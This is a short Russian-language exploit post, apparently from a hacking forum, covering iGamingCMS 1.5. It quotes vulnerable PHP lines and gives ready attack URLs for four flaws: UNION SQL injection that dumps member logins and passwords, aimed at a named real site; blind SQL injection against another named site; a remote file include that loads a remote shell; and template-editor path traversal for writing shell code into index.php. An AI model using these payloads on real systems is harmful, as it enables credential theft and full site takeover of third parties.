iGamingCMS1.5
SQL
Файл reviews.php
PHP код:
$review = $db->Execute(" SELECT * FROM `sp_reviews` WHERE sp_reviews.id = '{$_REQUEST}';");
__http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13+--+
_http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,concat_ws(0x3a,PSEUDO,pass),3, 4,5,6,7,8,9,10,11,12,13+from+sp_members+--+
ЗЫ префикс у них sp_
Blind-sql
Файл gamedetails.php
PHP код:
$result = $db->Execute("SELECT * FROM `sp_games` WHERE `id` = '$_REQUEST' LIMIT 1");
__http://www.patches-scrolls.info/gamedetails.php?id=1+and+substring(version(),1,1)= 5
PS там еще есть фалики с типа таким же запросом
RFI/shell
в админке Файл loadplugin.php
PHP код:
require_once("$_REQUEST");
необходимо
allow_url_include = on
MQ= off
http://127.0.0.1/iGamingCMS1.5/admin/loadplugin.php?load=http://shell.txt?
2) способ залития шелла
Файл template_editor.php
PHP код:
if ($myfilehandle=@fopen('../templates/' . $_REQUEST,'w')) { if (get_magic_quotes_gpc()) { $editbuffer = stripslashes($editbuffer); } fputs($myfilehandle,$editbuffer); fclose($myfilehandle); echo "Saved OK";
по сути
http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php
там дается на выбор файлы из папки templates, но помоему нам ни чего не мешает выйти)из нее
http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php?filename=../index.php
(ну или в один из инклудившихся файлов писать код)
и в дальнейшем пишем пыщ пыщ код))) или тупо код шелла
